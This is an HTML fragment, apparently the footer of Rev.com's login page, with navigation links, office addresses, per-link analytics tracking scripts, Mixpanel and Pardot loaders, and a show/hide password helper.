	<li class="list pl0 pt3"><a class="footer-text-link" href="/subtitle/translator" id="Footer CP: Foreign Subtitles">Foreign Subtitles</a></li>
	<script>
        var element = document.getElementById("Footer CP: Foreign Subtitles");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer CP: Foreign Subtitles",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/subtitle/translator",
                buttonText: "Foreign Subtitles",
                buttonLocation: "Main Page"
            });
        }
</script>
</ul>
</div>

<div class="pr4 footer-section mb4 w-50 w-auto-ns"><a class="f7 fw5 tracked ttu white text-link footer-column-header" href="https://enterprise.rev.com/rev-pro">Enterprise</a>

<ul class="f6 o-80 pl0 mt2 ma0">
	<li class="list pl0 pt3"><a class="footer-text-link" href="/security" id="Footer Enterprise: Security &amp;amp; Privacy">Security &amp; Privacy</a></li>
	<script>
        var element = document.getElementById("Footer Enterprise: Security &amp; Privacy");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer Enterprise: Security &amp; Privacy",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/security",
                buttonText: "Security &amp; Privacy",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/api" id="Footer Enterprise: API">API</a></li>
	<script>
        var element = document.getElementById("Footer Enterprise: API");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer Enterprise: API",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/api",
                buttonText: "API",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/speech-to-text-apis" id="Footer Enterprise: Speech to Text API">Speech to Text API</a></li>
	<script>
        var element = document.getElementById("Footer Enterprise: Speech to Text API");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer Enterprise: Speech to Text API",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/speech-to-text-apis",
                buttonText: "Speech to Text API",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="https://www.rev.ai" id="Footer Enterprise: Speech Recognition API">Speech Recognition API</a></li>
	<script>
        var element = document.getElementById("Footer Enterprise: Speech Recognition API");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer Enterprise: Speech Recognition API",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "https://www.rev.ai",
                buttonText: "Speech Recognition API",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/caption/integrations" id="Footer Enterprise: Integrations">Integrations</a></li>
	<script>
        var element = document.getElementById("Footer Enterprise: Integrations");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer Enterprise: Integrations",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/caption/integrations",
                buttonText: "Integrations",
                buttonLocation: "Main Page"
            });
        }
</script>
</ul>
</div>

<div class="pr4 footer-section mb4 w-50 w-auto-ns"><a class="f7 fw5 tracked ttu white text-link footer-column-header" href="/about">About</a>

<ul class="f6 o-80 pl0 mt2 ma0">
	<li class="list pl0 pt3"><a class="footer-text-link" href="/press" id="Footer About: Press">Press</a></li>
	<script>
        var element = document.getElementById("Footer About: Press");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Press",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/press",
                buttonText: "Press",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/careers" id="Footer About: Careers">Careers</a></li>
	<script>
        var element = document.getElementById("Footer About: Careers");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Careers",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/careers",
                buttonText: "Careers",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/diversity" id="Footer About: Diversity &amp;amp; Inclusion">Diversity &amp; Inclusion</a></li>
	<script>
        var element = document.getElementById("Footer About: Diversity &amp; Inclusion");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Diversity &amp; Inclusion",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/diversity",
                buttonText: "Diversity &amp; Inclusion",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/freelancers" id="Footer About: Freelancers">Freelancers</a></li>
	<script>
        var element = document.getElementById("Footer About: Freelancers");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Freelancers",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/freelancers",
                buttonText: "Freelancers",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/" id="Footer About: Blog">Blog</a></li>
	<script>
        var element = document.getElementById("Footer About: Blog");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Blog",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/",
                buttonText: "Blog",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/resources" id="Footer About: Resources">Resources</a></li>
	<script>
        var element = document.getElementById("Footer About: Resources");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Resources",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/resources",
                buttonText: "Resources",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/rev-affiliate-program" id="Footer About: Affiliates">Affiliates</a></li>
	<script>
        var element = document.getElementById("Footer About: Affiliates");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Affiliates",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/rev-affiliate-program",
                buttonText: "Affiliates",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/rev-influencer-affiliate-program" id="Footer About: Influencers">Influencers</a></li>
	<script>
        var element = document.getElementById("Footer About: Influencers");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Influencers",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/rev-influencer-affiliate-program",
                buttonText: "Influencers",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="https://support.rev.com/hc/en-us" id="Footer About: Help" rel="nofollow">Help</a></li>
	<script>
        var element = document.getElementById("Footer About: Help");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Help",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "https://support.rev.com/hc/en-us",
                buttonText: "Help",
                buttonLocation: "Main Page"
            });
        }
</script>
	<li class="list pl0 pt3"><a class="footer-text-link" href="/blog/transcripts" id="Footer About: Transcript Library">Transcript Library</a></li>
	<script>
        var element = document.getElementById("Footer About: Transcript Library");
        if (window.analytics) {
            window.analytics.trackLink(element, "Button Click", {
                altEventName: "Footer About: Transcript Library",
                stateChange: "Redirect",
                locationUrl: "https://www.rev.com/account/auth/login",
                redirectUrl: "/blog/transcripts",
                buttonText: "Transcript Library",
                buttonLocation: "Main Page"
            });
        }
</script>
</ul>
</div>

<div class="w-100 w-auto-ns flex pl0 mb3">
<div class="mr3">
<div class="f7 fw5 tracked ttu">Get in touch</div>

<div class="mt2 mb3 f6 pt3 lh-title">
<div class="flex flex-column-ns flex-row flex-wrap">
<div class="w-100 w-auto-ns mb3 o-80">222 Kearny St, 8th Floor<br />
San Francisco, CA<br />
94108</div>

<div class="w-100 w-auto-ns o-80">1717 W 6th St, Suite 310<br />
Austin, TX<br />
78703</div>

<div class="mt3 w-100 o-80">&nbsp;</div>
<a class="mt3 base-button-dark-gray button-small ttu fw5 tracked-mega tc" href="/freelancers">Become a Freelancer</a></div>
</div>
</div>
</div>

<div class="w-100 f6 o-80 flex flex-wrap"><span class="mr3 order-0-ns order-1">&copy; Rev.com</span>

<div class="mb0-ns mb3 order-1-ns order-0"><a class="ml2-ns mr2 footer-text-link" href="/reviews">Reviews</a> | <a class="mh2 footer-text-link" href="/about/terms">Terms</a> | <a class="mh2 footer-text-link" href="/about/privacy">Privacy</a> | <a class="mh2 footer-text-link" href="/about/privacy#additional-california-privacy-notice">CA Privacy</a> | <a class="mh2 footer-text-link" href="/sitemap">Sitemap</a></div>
</div>
</div>
</footer>
<script src="/build/curve-common.bundle.js?v=4088817693B71922948D935C1F483974" type="text/javascript"></script><script src="/build/mp.bundle.js?v=64DECFAE0A0E52A3658C858B3A3E216C" type="text/javascript"></script><script type="text/javascript">
        rev_Mixpanel = new ft_Mixpanel('d24fd33359700c4000bbd1c190f60e32', '', 'rev', false);
    </script><script>
            $(function() {
                rev_Mixpanel.trackLinks("mixpanel-link");
            });
        </script><script type="text/javascript">
    piAId = 757353;
    piCId = 3281;
    piHostname = 'pi.pardot.com';

    (function() {
        function async_load(){
	        var s = document.createElement('script'); s.type = 'text/javascript';
            s.src = ('https:' == document.location.protocol ? 'https://pi' : 'http://cdn') + '.pardot.com/pd.js';
            var c = document.getElementsByTagName('script')[0]; c.parentNode.insertBefore(s, c);
        }
        if(window.attachEvent) { window.attachEvent('onload', async_load); }
        else { window.addEventListener('load', async_load, false); }
    })();
</script><script type="text/javascript">
        var ft_page = new LoginPage('/workspace/mywork', '');
        
        const passwordFieldId = "Password";
        const showHidePasswordSpanId = "show-hide-password";
        
        let showHidePassword = new ShowHidePassword(passwordFieldId, showHidePasswordSpanId);
        
        showHidePassword.addShowHidePasswordListener();
    </script><script type="text/javascript">
    window.Curve.Controls.Menu('#services-menu', '#services-menu-content');
    window.Curve.Controls.Menu('#resources-menu', '#resources-menu-content');
</script></body>
</html>
